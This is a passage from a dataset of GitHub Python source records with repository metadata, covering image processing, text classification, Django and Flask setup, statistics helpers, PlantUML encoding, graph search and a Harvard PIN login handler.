overwrite=True)\n\nfill_mask = pipeline(\"fill-mask\", model=token_dir, tokenizer=token_dir)\nprint(fill_mask(\"Human thinking involves.\"))\n","repo_name":"mecha2k/py-nlp","sub_path":"src/transformers/03 KantaiBERT.py","file_name":"03 KantaiBERT.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34130451484","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimg = cv2.imread('woman.jpg')\nrow,cols,channels = img.shape\nsmallest = np.amin(img)\nbiggest = np.amax(img)\n\n\noutput = img.copy()\nlista = []\nfor i in range (row):\n for j in range (cols): \n lista.append(img[i][j][0])\n output[i][j] = (img[i][j]-smallest)*(255/(biggest-smallest))\n\nprint(\"min value %s max value %s\" % (smallest , biggest))\n\ncv2.imwrite('outputcell.png',output)\nsmallest = np.amin(output)\nbiggest = np.amax(output)\nprint( \"maximo:\" + str(biggest)+\"minimo\"+str(smallest))\n\ncv2.imshow('input',img)\ncv2.imshow('output',output)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\nhistr = cv2.calcHist( [img],[0],None,[256],[0,256])\nhistr2 = cv2.calcHist( [output],[0],None,[256],[0,256])\nplt.plot(histr)\nplt.plot(histr2)\nplt.show()\n#plt.hist(output.ravel(),256,[0,256]); plt.show()\n#plt.hist(img.ravel(),256,[0,256]); plt.show()\n","repo_name":"samm007aqp/crontrast_stretching","sub_path":"first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41789626614","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Time: 2022/10/25:14:36\n# @Author: huxb\n# @Email: hxb_086@163.com\n\nfrom jieba import lcut\nimport pandas as pd\n\n\n# 对于学历进行文本分类 0代表研究生以上 1代表本科 2专科 3高中及以下\n\n\ndef MultinomialNBModel(df):\n df_train = df.loc[~(df.educationPosition.isnull())]\n df_test = df.loc[(df.educationPosition.isnull())]\n data = df_train[[\"educationPosition\", 
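The contrast-stretching script above walks the image pixel by pixel in Python; the same min-max stretch is a single vectorized NumPy expression, with a float intermediate to keep the scaling exact. A small sketch on synthetic data (the guard for a flat image is an addition, not in the original):

import numpy as np

def stretch(img):
    # Min-max contrast stretch to the full [0, 255] range, vectorized.
    lo = img.min()
    hi = img.max()
    if hi == lo:
        return np.zeros_like(img)  # flat image: avoid division by zero
    out = (img.astype(np.float32) - lo) * (255.0 / (hi - lo))
    return out.astype(np.uint8)

img = np.array([[10, 60], [110, 210]], dtype=np.uint8)
print(stretch(img))  # values rescaled so 10 -> 0 and 210 -> 255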
\"requirement\"]].values\n\n X, Y = [' '.join(lcut(i[1])) for i in data], [i[0] for i in data]\n\n from sklearn.feature_extraction.text import CountVectorizer\n from sklearn.feature_extraction.text import TfidfTransformer\n\n # 将文本中的词语转换为词频矩阵\n vectorizer = CountVectorizer()\n\n # 计算个词语出现的次数\n vec = vectorizer.fit(X)\n X_data = vec.transform(X)\n\n # 获取词袋中所有文本关键词\n # word = vectorizer.get_feature_names()\n\n # print('【查看单词】')\n\n # for w in word:\n # print(w, end=\" \")\n # else:\n # print(\"\\n\")\n\n # 将词频矩阵X统计成TF-IDF值\n transformer = TfidfTransformer()\n\n tf = transformer.fit(X_data)\n tfidf = tf.transform(X_data)\n\n # 查看数据结构 tfidf[i][j]表示i类文本中的tf-idf权重\n weight = tfidf.toarray()\n # print(weight)\n\n # --------------------------------------数据分析------------------------------------\n from sklearn.naive_bayes import MultinomialNB\n from sklearn.metrics import classification_report\n from sklearn.model_selection import train_test_split\n\n X_train, X_test, y_train, y_test = train_test_split(weight, Y)\n # print(len(X_train), len(X_test))\n # print(len(y_train), len(y_test))\n # print(X_train)\n\n # 调用MultinomialNB分类器\n clf = MultinomialNB().fit(X_train, y_train)\n pre = clf.predict(X_test)\n # print(\"预测结果:\", pre)\n # print(\"真实结果:\", y_test)\n # print(classification_report(y_test, pre))\n\n # 对于测试数据\n\n df_test_use = df_test[[\"educationPosition\", \"requirement\"]]\n data_test = df_test_use.values\n X_test1 = [' '.join(lcut(i[1])) for i in data_test]\n X_test1 = vec.transform(X_test1)\n # tfidf1 = tf.transform(X_test1)\n\n # 查看数据结构 tfidf[i][j]表示i类文本中的tf-idf权重\n # weight1 = tfidf1.toarray()\n # print(weight1)\n\n pre1 = clf.predict(X_test1)\n # print(\"预测结果:\", pre1)\n\n df_test['educationPosition'] = pre1\n\n # df_pre = df.loc[df.education.isnull()]\n # # df.loc[df.education.isnull()]['predict'] = pre1\n\n # df_pre['education'] = pre1\n # df_test.to_csv(\"bb3.csv\")\n\n df_position = pd.concat([df_train, df_test])\n\n return (df_position)\n","repo_name":"hxb087/people_position","sub_path":"model/MultinomialNBModel.py","file_name":"MultinomialNBModel.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74438671411","text":"from pygmi import Button, events, wmii\n\nclass Mail(object):\n\n def __init__(self, name='mail', colors=None, warn_colors=None,\n warn_level=5):\n if not colors: colors = wmii.cache['normcolors']\n if not warn_colors: warn_colors = wmii.cache['urgentcolors']\n self.colors = colors\n self.warn_colors = warn_colors\n self.warn_level = warn_level\n self.button = Button('right', name, colors)\n events.bind({'Mail': lambda args: self._mail(args)})\n self._mail('init 0')\n\n def _mail(self, mail):\n count = int(mail.split()[1])\n if count < self.warn_level:\n self.button.colors = self.colors\n else:\n self.button.colors = self.warn_colors\n self.button.label = 'Mail: %d' % count\n","repo_name":"epontan/python-wmiirc-plugins","sub_path":"mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10967652344","text":"from app import views\nfrom django.urls import path,include\nfrom rest_framework import routers\nrouter = routers.SimpleRouter()\nrouter.register('allstudents',views.allstudents)\nrouter.register('allusers',views.allusers)\n\nurlpatterns = [\n path('',views.home,name=\"home\"),\n 
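The CountVectorizer, TfidfTransformer and MultinomialNB steps in MultinomialNBModel can be wrapped in a scikit-learn Pipeline, which keeps the fitted vocabulary, idf weights and classifier together so that predicting the unlabeled rows is a single call. A toy sketch, where the strings stand in for the jieba-tokenized requirement text and the labels mirror the 0-3 education codes:

from sklearn.pipeline import Pipeline
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.naive_bayes import MultinomialNB

clf = Pipeline([
    ('counts', CountVectorizer()),   # word counts
    ('tfidf', TfidfTransformer()),   # tf-idf weighting
    ('nb', MultinomialNB()),         # the classifier
])

X = ['bachelor degree required', 'master degree preferred',
     'high school diploma', 'phd in computer science']
y = ['1', '0', '3', '0']

clf.fit(X, y)  # fits vectorizer, tf-idf and classifier in one pass
print(clf.predict(['master or phd degree']))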
path('',include(router.urls)),\n]\n","repo_name":"sudhinsuresh/DjangoApiusingViewset","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28606767734","text":"from prettytable import PrettyTable\r\n\r\nquanti = {'M': 2, 'Q': 4, 'D': 10, 'P': 100}\r\n\r\ndef user_input():\r\n input_data = []\r\n data_start = []\r\n data_end = []\r\n frequency = []\r\n first_start, first_end = input('First Data = ').split('-')\r\n first_I = (int(first_end) - int(first_start)) + 1\r\n last_start, last_end = input('Last Data = ').split('-')\r\n last_I = (int(last_end) - int(last_start)) + 1\r\n if first_I == last_I:\r\n I = first_I\r\n total_data = int(((int(last_start) - int(first_start)) / I) + 1)\r\n data_start.append(int(first_start))\r\n data_end.append(int(first_end))\r\n for x in range(1, total_data):\r\n start = int(data_end[x - 1] + 1)\r\n end = int(start + (I - 1))\r\n data_start.append(start)\r\n data_end.append(end)\r\n for x in range(0, total_data):\r\n create_data = str(data_start[x]) + '-' + str(data_end[x])\r\n input_data.append(create_data)\r\n for data in input_data:\r\n f = input('Frequency of ' + str(data) + ' : ')\r\n frequency.append(float(f))\r\n print()\r\n cf = []\r\n make_cf = 0\r\n for i in frequency:\r\n make_cf += i\r\n cf.append(int(make_cf))\r\n show_data = PrettyTable([' Classes ', ' f ', ' cf '])\r\n for z in range(len(input_data)):\r\n show_data.add_row([input_data[z],frequency[z],cf[z]])\r\n print(show_data)\r\n return input_data, frequency, data_start, data_end, I,cf\r\n\r\n\r\ndef find_ans(data,frequency,data_start,find_alpa,find_num,I,cf):\r\n N = cf[len(cf) - 1]\r\n column = quanti[find_alpa]\r\n classs = find_num * N / column\r\n loca = 0\r\n for i in range(0, len(cf)):\r\n if cf[i] > classs:\r\n loca = i\r\n break\r\n L = data_start[loca] - 0.5\r\n cfL = cf[loca - 1]\r\n fD = int(frequency[loca])\r\n ans = L + (I * ((classs - cfL) / fD))\r\n # print('cf >>>', cf)\r\n print('N >>>', int(N))\r\n print('4/10/100 >>>', column)\r\n print(find_alpa + str(find_num) + ' class >>> ' + str(classs) + '__')\r\n print(' - - -')\r\n print(f'location >>> line {loca + 1} ({data[loca]})')\r\n print('L >>>', L)\r\n print('I >>>', I)\r\n print('rN/*** >>>', classs)\r\n print('cfL >>>', cfL)\r\n print('f(Q/D/R) >>>', fD)\r\n print(find_alpa + str(find_num) + ' >>> ' + str(ans))\r\n\r\ndata_C, frequency_C, data_start_C, data_end_C, I_C, cf = user_input()\r\nwhile True:\r\n print()\r\n find = input('find : ').upper()\r\n if find == '-':\r\n break\r\n else:\r\n alpa = find[0]\r\n num = int(find[1:len(find)])\r\n find_ans(data_C , frequency_C, data_start_C, alpa ,num ,I_C,cf)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"bpantan202/Statistic-Calculator","sub_path":"5_Quartile Deciles Percentiles (Group).py","file_name":"5_Quartile Deciles Percentiles (Group).py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6475806783","text":"\"\"\"\nImplement PlantUML Text Encoding, described in http://plantuml.com/pte.\n\nA text description has to be:\n- Encoded in UTF-8\n- Compressed using Deflate algorithm\n- Reencoded in ASCII using a transformation \"close to base64\"\n\"\"\"\nimport zlib\n\nfrom six.moves import zip_longest\nfrom six import string_types\n\nSIXBITOFFSET = [48] * 10 + [55] * 26 + [61] * 26 + [-17] + [32]\n\n\ndef encode(text):\n \"Apply PlantUML 
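The calculator above implements the grouped-data quantile formula ans = L + I * ((rN/k - cfL) / f). A compact functional form of the same computation, keeping the script's strict cf > rN/k convention for locating the class (the example classes are illustrative, and like the original it assumes the target falls strictly inside the distribution):

def grouped_quantile(freqs, starts, width, r, k):
    # freqs: class frequencies; starts: lower class limits; width: class width I.
    # Returns the r-th k-tile, e.g. r=1, k=4 for Q1, or r=5, k=10 for D5.
    cf, total = [], 0
    for f in freqs:
        total += f
        cf.append(total)
    target = r * total / k
    i = next(idx for idx, c in enumerate(cf) if c > target)  # locate the class
    L = starts[i] - 0.5                # lower class boundary
    cf_below = cf[i - 1] if i else 0
    return L + width * (target - cf_below) / freqs[i]

# classes 1-5, 6-10, 11-15 with frequencies 4, 6, 10; D5 (the median)
print(grouped_quantile([4, 6, 10], [1, 6, 11], 5, 5, 10))  # 10.5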
text encoding to a diagram description\"\n assert isinstance(text, string_types)\n utf8_encoded_data = text.encode('utf-8')\n compressed_data = bytearray(zlib.compress(utf8_encoded_data)[2:-4])\n return _encode_similar_to_base64(compressed_data)\n\n\ndef _encode_similar_to_base64(byte_seq):\n \"Encode a byte sequence 3 bytes at a time, padding with zeros\"\n assert isinstance(byte_seq, bytearray)\n return ''.join(\n _encode_3_bytes(c1, c2, c3) for c1, c2, c3 in _grouper(byte_seq, 3, 0))\n\n\ndef _grouper(iterable, n, fillvalue=None):\n \"Collect data into fixed-length chunks or blocks\"\n assert isinstance(iterable, bytearray)\n args = [iter(iterable)] * n\n return zip_longest(*args, fillvalue=fillvalue)\n\n\ndef _encode_3_bytes(byte1, byte2, byte3):\n \"Take 3 8-bits groups and encode them as 4 6-bits groups\"\n assert isinstance(byte1, int)\n assert isinstance(byte2, int)\n assert isinstance(byte3, int)\n sixbits1 = byte1 >> 2\n sixbits2 = ((byte1 & 0x3) << 4) | (byte2 >> 4)\n sixbits3 = ((byte2 & 0xF) << 2) | (byte3 >> 6)\n sixbits4 = byte3 & 0x3F\n return ''.join([\n _encode_6_bits(sixbits1 & 0x3F), _encode_6_bits(sixbits2 & 0x3F),\n _encode_6_bits(sixbits3 & 0x3F), _encode_6_bits(sixbits4 & 0x3F)\n ])\n\n\ndef _encode_6_bits(six_bits):\n \"Encode a group of 6 bits into a charcter valid in a URL\"\n assert isinstance(six_bits, int)\n return chr(SIXBITOFFSET[six_bits] + six_bits)\n","repo_name":"qdamian/htmlvis","sub_path":"htmlvis/plantuml_text_encoding.py","file_name":"plantuml_text_encoding.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38125351654","text":"s = input()\nk = int(input())\nres = {}\nfor i in range(1,len(s),2):\n tmp = int(f'{s[i-1]}{s[i]}')\n res[tmp] = res[tmp] +1 if tmp in res else 1\n\nres = sorted(res.items())\nok = True\nfor key, val in res:\n if val >= k:\n print(key, val)\n ok = False\n\nif ok: print(\"NOT FOUND\")","repo_name":"Sudo248/Python-PTIT","sub_path":"nguong_toi_thieu.py","file_name":"nguong_toi_thieu.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23506823549","text":"import sys\ninput = sys.stdin.readline\n\nN, M = map(int, input().split())\nmatrix = [[1e9] * (N+1) for _ in range(N+1)]\nfor _ in range(M):\n x, y = map(int, input().split())\n matrix[x][y] = 1\n matrix[y][x] = 1\n\nfor k in range(1, N+1):\n for i in range(1, N+1):\n for j in range(1, N+1):\n if matrix[i][j] > matrix[i][k] + matrix[k][j]:\n matrix[i][j] = matrix[i][k] + matrix[k][j]\n\nmini = 1e9\nanswer = 0\nfor i in range(1, N+1):\n x = sum(matrix[i][1:])\n if x < mini:\n answer = i\n mini = x\n\nprint(answer)","repo_name":"nkrang/Algorithm-Study","sub_path":"202202/B-1389/케빈_베이컨의_6단계_법칙.py","file_name":"케빈_베이컨의_6단계_법칙.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16570467733","text":"import numpy as np\nimport csv\nimport matplotlib.pyplot as plt\nimport copy\n\n\ndef string_soma_to_array(str_soma):\n\n\tsoma_array = str_soma[1:-1].split()\n\tsoma_array[0] = int(soma_array[0])\n\tsoma_array[1] = int(soma_array[1])\n\tsoma_array[2] = int(soma_array[2])\n\tsoma_array[3] = soma_array[3][1:-1]\n\tsoma_array[4] = int(soma_array[4])\n\tsoma_array[5] = int(soma_array[5])\n\tsoma_array[6] = int(soma_array[6])\n\n\treturn np.array(soma_array,dtype=object)\n\n\n\nsoma_path = 
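A typical consumer of encode() is a PlantUML server, which takes the encoded string directly in a URL path. A usage sketch follows; it assumes the htmlvis package from the snippet is importable, and the public plantuml.com endpoint is just one possible renderer:

from htmlvis.plantuml_text_encoding import encode  # assumes the htmlvis package is importable

diagram = '@startuml\nAlice -> Bob: hello\n@enduml'
url = 'http://www.plantuml.com/plantuml/png/' + encode(diagram)
print(url)  # open in a browser; the server decodes and renders the diagram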
'/data/elowsky/OLST/reconstruction/180926/updated_somas_after_cnn_2.npy'\nsomas = np.load(soma_path ,allow_pickle=True)\n\n# read csv\ncsv_path = '/data/elowsky/OLST/reconstruction/triage/triage_duplicates_truth_180926.csv'\n\nduplicate_array = np.empty(shape=(len(somas),8),dtype=object)\n\nwith open(csv_path) as csvfile:\n\treadCSV = csv.reader(csvfile, delimiter=',')\n\tfor i,row in enumerate(readCSV):\n\n\t\tdist = int(row[0])\n\t\t(dist_x, dist_y, dist_z) = (int(row[1]),int(row[2]),int(row[3]))\n\t\tsoma_1 = row[4]\n\t\tsoma_2 = row[5]\n\t\tdirection = row[6]\n\t\tduplicate = int(row[7])\n\n\t\tduplicate_array[i,:] = np.array([dist,dist_x,dist_y,dist_z,soma_1,soma_2,direction,duplicate],dtype=object)\n\nduplicate_array_copy = copy.deepcopy(duplicate_array)\n\nduplicates = []\n\npredictions = [0]*len(duplicate_array)\ntruth = list(duplicate_array[:,-1])\n\nwhile len(duplicate_array) > 0:\n\n\tsoma_pair = duplicate_array[0]\t\n\n\tdup_tuple_soma_array = ()\n\tdup_tuple_duplicate_array = ()\t\n\tdirection_tuple = ()\n\n\tdist = soma_pair[0]\n\tdist_x = soma_pair[1]\n\tdist_y = soma_pair[2]\n\tdist_z = soma_pair[3]\n\t\n\tsoma_1 = soma_pair[4]\n\tsoma_1_array = string_soma_to_array(soma_1)\n\tsoma_1_index_in_somas = np.where(np.all(somas == soma_1_array,axis=1))[0][0]\n\tsoma_1_index_in_duplicates = np.where(duplicate_array[:,4] == soma_1)[0][0]\n\n\tsoma_2 = soma_pair[5]\n\tsoma_2_array = string_soma_to_array(soma_2)\n\t\t\n\t# if soma_2 is no longer in duplicate array\n\tif not np.any(duplicate_array[:,4] == soma_2):\n\t\tduplicate_array = np.delete(duplicate_array,soma_1_index_in_duplicates,0)\n\t\tcontinue\n\n\tsoma_2_index_in_somas = np.where(np.all(somas == soma_2_array,axis=1))[0][0]\n\tsoma_2_index_in_duplicates = np.where(duplicate_array[:,4] == soma_2)[0][0]\n\n\tdirection = soma_pair[6]\n\n\tif dist <= 100:\t\n\t\tif duplicate_array[soma_2_index_in_duplicates,5] == soma_1:\n\n\t\t\t\t# prediction list update\n\t\t\t\tpredictions[np.where(soma_1 == duplicate_array_copy[:,4])[0][0]] = 1\n\t\t\t\tpredictions[np.where(soma_2 == duplicate_array_copy[:,4])[0][0]] = 1\n\n\t\t\t\t# add to duplicate tuple\n\t\t\t\tdup_tuple_soma_array = dup_tuple_soma_array + (soma_1_index_in_somas,soma_2_index_in_somas)\n\t\t\t\tdup_tuple_duplicate_array = dup_tuple_duplicate_array + (soma_1_index_in_duplicates,soma_2_index_in_duplicates)\n\t\t\t\tdirection_tuple = direction_tuple + (direction,)\n\n\t\t\t\t# find all other somas that are partners with 1 and 2\n\t\t\t\tindices_of_partners_with_1 = list(np.where(duplicate_array[:,5] == soma_1)[0])\n\t\t\t\tindices_of_partners_with_2 = list(np.where(duplicate_array[:,5] == soma_2)[0])\n\n\t\t\t\t# remove partner indices\n\t\t\t\tindices_of_partners_with_1.remove(soma_2_index_in_duplicates)\n\t\t\t\tindices_of_partners_with_2.remove(soma_1_index_in_duplicates)\n\t\t\n\t\t\t\tfor ind in indices_of_partners_with_1:\n\t\t\t\t\tsoma_pair = duplicate_array[ind,:]\n\t\t\t\t\tdist = soma_pair[0]\n\t\t\t\t\tsoma = soma_pair[4]\n\t\n\t\t\t\t\tdirection = soma_pair[6]\n\t\t\t\t\tsoma_array = string_soma_to_array(soma)\n\t\t\t\t\tsoma_index_in_somas = np.where(np.all(somas == soma_array,axis=1))[0][0]\n\t\t\t\t\tif dist < 100:\n\t\t\t\t\t\tif direction not in direction_tuple or ('zy' in direction_tuple and direction_tuple.count(direction)<2) :\n\t\t\t\t\t\t\tdup_tuple_soma_array = dup_tuple_soma_array + (soma_index_in_somas,)\n\t\t\t\t\t\t\tdup_tuple_duplicate_array = dup_tuple_duplicate_array + (ind,)\n\t\t\t\t\t\t\tdirection_tuple = direction_tuple + 
(direction,)\n\t\t\t\t\t\t\t# prediction list update\n\t\t\t\t\t\t\tpredictions[np.where(soma == duplicate_array_copy[:,4])[0][0]] = 1\n\n\n\n\n\t\t\t\tfor ind in indices_of_partners_with_2:\n\t\t\t\t\tsoma_pair = duplicate_array[ind,:]\n\t\t\t\t\tdist = soma_pair[0]\n\t\t\t\t\tsoma = soma_pair[4]\n\n\t\t\t\t\tdirection = soma_pair[6]\n\t\t\t\t\tsoma_array = string_soma_to_array(soma)\n\t\t\t\t\tsoma_index_in_somas = np.where(np.all(somas == soma_array,axis=1))[0][0]\n\t\t\t\t\tif dist < 100:\n\t\t\t\t\t\tif direction not in direction_tuple or ('zy' in direction_tuple and direction_tuple.count(direction)<2) :\n\t\t\t\t\t\t\tdup_tuple_soma_array = dup_tuple_soma_array + (soma_index_in_somas,)\n\t\t\t\t\t\t\tdup_tuple_duplicate_array = dup_tuple_duplicate_array + (ind,)\n\t\t\t\t\t\t\tdirection_tuple = direction_tuple + (direction,)\n\t\t\t\t\t\t\t# prediction list update\n\t\t\t\t\t\t\tpredictions[np.where(soma == duplicate_array_copy[:,4])[0][0]] = 1\n\n\n\t\t\t\t# remove somas that are grouped from duplicates array\n\t\t\t\tduplicate_array = np.delete(duplicate_array,dup_tuple_duplicate_array,0)\n\n\t\t\t\t# add to final duplcate list\n\t\t\t\tduplicates.append(dup_tuple_soma_array)\n\t\telse:\n\n\t\t\tprint('not partners')\n\n\telse:\n\t\t# Distance is > 100, delete\n\t\tduplicate_array = np.delete(duplicate_array,[soma_1_index_in_duplicates,soma_2_index_in_duplicates],0)\n\nsoma_count = 0\nsize_2 = 0\nsize_3 = 0\nsize_4 = 0\n\nfor dup in duplicates:\n\tif len(dup) == 2:\n\t\tsize_2 += 1\n\tif len(dup) == 3:\n\t\tsize_3 += 1\n\tif len(dup) == 4:\n\t\tsize_4 += 1\n\tsoma_count += len(dup)\n\nprint()\nprint('# Somas:',len(somas))\nprint()\nprint('# Total Duplicate Groups:', len(duplicates))\nprint('# Total Somas in Groups:', soma_count)\nprint('# 2-Groups:', size_2)\nprint('# 3-Groups:', size_3)\nprint('# 4-Groups:', size_4)\nprint()\n\n\n\ntp = sum([1 for x in zip(predictions,truth) if x[0] == 1 and x[1]==1])\ntn = sum([1 for x in zip(predictions,truth) if x[0] == 0 and x[1]==0])\nfp = sum([1 for x in zip(predictions,truth) if x[0] == 1 and x[1]==0])\nfn = sum([1 for x in zip(predictions,truth) if x[0] == 0 and x[1]==1])\nacc = round(sum([1 for x in zip(predictions,truth) if x[0] == x[1]])/len(truth)*100,1)\n\nprint('Accuracy:',acc,'%')\nprint('# tp:',tp)\nprint('# tn:',tn)\nprint('# fp:',fp)\nprint('# fn:',fn)\n\n#for i,x in enumerate(zip(predictions,truth)):\n#\tif x[0] == 0 and x[1] == 1:\n#\t\tprint(i+1)\n\t\n\n\n\n\n\n\n\t\t\n\n\n\t\t\n\n\n\n\t\t\n\n","repo_name":"coreyelowsky/OLST","sub_path":"soma_detection/triage_duplicates_truth_analysis.py","file_name":"triage_duplicates_truth_analysis.py","file_ext":"py","file_size_in_byte":6006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27817567375","text":"import os\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_mail import Mail\nfrom flask_images import Images\nimport logging\nimport logging.config\nimport sys\n\n\ndotenv_path = os.path.join(os.getcwd(), '.env')\nif os.path.isfile(dotenv_path):\n from dotenv import load_dotenv\n load_dotenv(dotenv_path)\n\n\napp = Flask(__name__)\napp.config.from_object('lifebartenders.config')\n\ndb = SQLAlchemy(app)\n\nmail = Mail(app)\n\nimages = Images(app)\n\nhandler = logging.StreamHandler(sys.stdout)\nif not app.debug:\n handler = logging.handlers.RotatingFileHandler(\n 'app.log', maxBytes=102400, backupCount=3\n )\n\nformater = logging.Formatter(\n '{\"timestamp\": \"%(asctime)s\", '\n '\"level\": 
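The tp/tn/fp/fn tallies at the end of the triage script are computed with four separate zip passes; scikit-learn's confusion_matrix yields the same four counts in one call and is a handy cross-check. A sketch with toy labels (adding sklearn is my assumption; the script itself only uses numpy, csv and matplotlib):

from sklearn.metrics import accuracy_score, confusion_matrix

truth       = [1, 0, 1, 1, 0, 0]
predictions = [1, 0, 0, 1, 1, 0]

# confusion_matrix with labels=[0, 1] returns [[tn, fp], [fn, tp]]
tn, fp, fn, tp = confusion_matrix(truth, predictions, labels=[0, 1]).ravel()
print('Accuracy:', round(accuracy_score(truth, predictions) * 100, 1), '%')
print('# tp:', tp, '# tn:', tn, '# fp:', fp, '# fn:', fn)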
\"%(levelname)s\", '\n '\"module\": \"%(module)s\", '\n '\"function\": \"%(funcName)s\", '\n '\"file\": \"%(filename)s\", '\n '\"line\": \"%(lineno)d\", '\n '\"message\": \"%(message)s\"}',\n \"%Y-%m-%d %H:%M:%S\"\n)\n\nhandler.setFormatter(formater)\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.INFO)\nlog.addHandler(handler)\n","repo_name":"leandrocorreasantos/lifebartenders","sub_path":"lifebartenders/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25053269751","text":"from django.contrib.auth import authenticate, login\nfrom hu_authzproxy.hu_authz_pin_backend import HarvardAuthZProxyBackend\nfrom hu_authzproxy.authz_proxy_validation_info import AuthZProxyValidationInfo\nimport sys\n\n \n \nclass AuthZProxyLoginHandler:\n \"\"\"Handles the attempt to authorize/login the user, may be used in a view\n \n ----------------------------\n sample usage in a view:\n ----------------------------\n pin_login_handler = AuthZProxyLoginHandler(request, validation_settings) # request object\n\n validation_settings = { 'app_names' : [']}\n\n\n if pin_login_handler.did_login_succeed():\n #the_user = pin_login_handler.user # if needed\n return HttpResponseRedirect('go to login success page')\n else:\n err_dict = pin_login_handler.get_error_dict() # get error lookup for use in template\n return render_to_response('template_dir/login_failed.html', err_dict, context_instance=RequestContext(request))\n\n (i) Sample file: see hu_authzpoxy/views.py\n \n ----------------------------\n sample usage in a template, if error occurred\n ---------------------------- \n {% if pin_auth_has_err %}\n Sorry! Login failed.\n {% if pin_auth_err_no_email_in_hu_ldap %}You do not have an email specified in the Harvard directory.{% endif %}\n {% if pin_auth_err_huid_not_found_in_hu_ldap %}Your information was not found in the Harvard directory.{% endif %}\n {% if pin_auth_err_account_not_active %}Your account is not active. Please contact the administrator.{% endif %}\n
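One caveat with the %-style JSON format string assembled above: any log message containing a double quote produces invalid JSON output. A stdlib-only alternative builds the record dict and serializes it with json.dumps; the field set mirrors the snippet, while the formatter class name is mine:

import json
import logging

class JsonFormatter(logging.Formatter):
    def format(self, record):
        payload = {
            'timestamp': self.formatTime(record, '%Y-%m-%d %H:%M:%S'),
            'level': record.levelname,
            'module': record.module,
            'function': record.funcName,
            'file': record.filename,
            'line': record.lineno,
            'message': record.getMessage(),  # json.dumps escapes quotes safely
        }
        return json.dumps(payload)

log = logging.getLogger('demo')
handler = logging.StreamHandler()
handler.setFormatter(JsonFormatter())
log.addHandler(handler)
log.setLevel(logging.INFO)
log.info('contains "quotes" safely')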
Return to the log in page.
\n {% endif %}\n \n (i) Sample file: see templates/view_pin_login_failed.html\n \n \n ---------------------------- \n # How Django handles authentication after pin is verfied. \n # 'access_settings' are specific to how Django handles its User objects\n # (Again, these permissions are checked AFTER a successful HU Pin login)\n #\n # example of using 'access_settings' in the init \n ---------------------------- \n # restrict to active, staff users in Django\n access_settings = { 'restrict_to_existing_users':True \\\n , 'restrict_to_active_users':True \\\n , 'restrict_to_staff':False \\\n , 'restrict_to_superusers':False}\n \n pin_login_handler = AuthZProxyLoginHandler(request, app_names, user_request_ip, gnupghome, **access_settings)\n \n \n \"\"\"\n def __init__(self, authz_validation_info, **access_settings):\n \"\"\"\n authz_validation_info is an AuthZProxyValidationInfo object\n \"\"\"\n self.user = None\n self.authz_validation_info = authz_validation_info\n self.has_err = False\n self.err_lookup = {}\n self.err_msgs = []\n \n self.access_settings = access_settings\n \n self.handle_authorization()\n \n def did_login_succeed(self):\n if self.user is not None and not self.has_err:\n return True\n return False\n \n def get_error_dict(self):\n return self.err_lookup \n\n def get_err_msgs(self):\n return self.err_msgs\n \n def get_user(self):\n return self.user\n \n def handle_authorization(self):\n self.user = None\n \n if self.access_settings is not None:\n authorization_backend = HarvardAuthZProxyBackend( authz_validation_info=self.authz_validation_info, **self.access_settings) \n else:\n authorization_backend = HarvardAuthZProxyBackend(self.authz_validation_info)\n \n self.user = authorization_backend.authenticate()\n if self.user:\n self.has_err= False\n else:\n self.has_err = True\n self.err_lookup = authorization_backend.get_err_flag_dict()\n self.err_msgs = authorization_backend.get_err_msgs()\n \n \n \n","repo_name":"raprasad/Django-HU-Pin-Auth","sub_path":"hu_authzproxy/authzproxy_login_handler.py","file_name":"authzproxy_login_handler.py","file_ext":"py","file_size_in_byte":3965,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"28194191766","text":"\nimport logging\n#设置配置信息\nlogging.basicConfig(level=logging.INFO,format='%(asctime)s-%(name)s-%(levelname)s-%(message)s')\n#定义日志名称\nlogger=logging.getLogger(\"loging_demo\")\n#info.debug\nlogger.info(\"info\")\nlogger.debug(\"debug\")\nlogger.warning(\"warning\")\n","repo_name":"Dragon0129-jia/APItest","sub_path":"logs/loging_demo.py","file_name":"loging_demo.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13237966437","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Androguard is a full Python tool to play with Android files.\"\"\"\n\nfrom __future__ import print_function\n\n# core modules\nimport sys\nimport logging\n\n# 3rd party modules\nimport click\n\n# local modules\nimport androguard\nfrom androguard.core.androconf import show_logging\nfrom 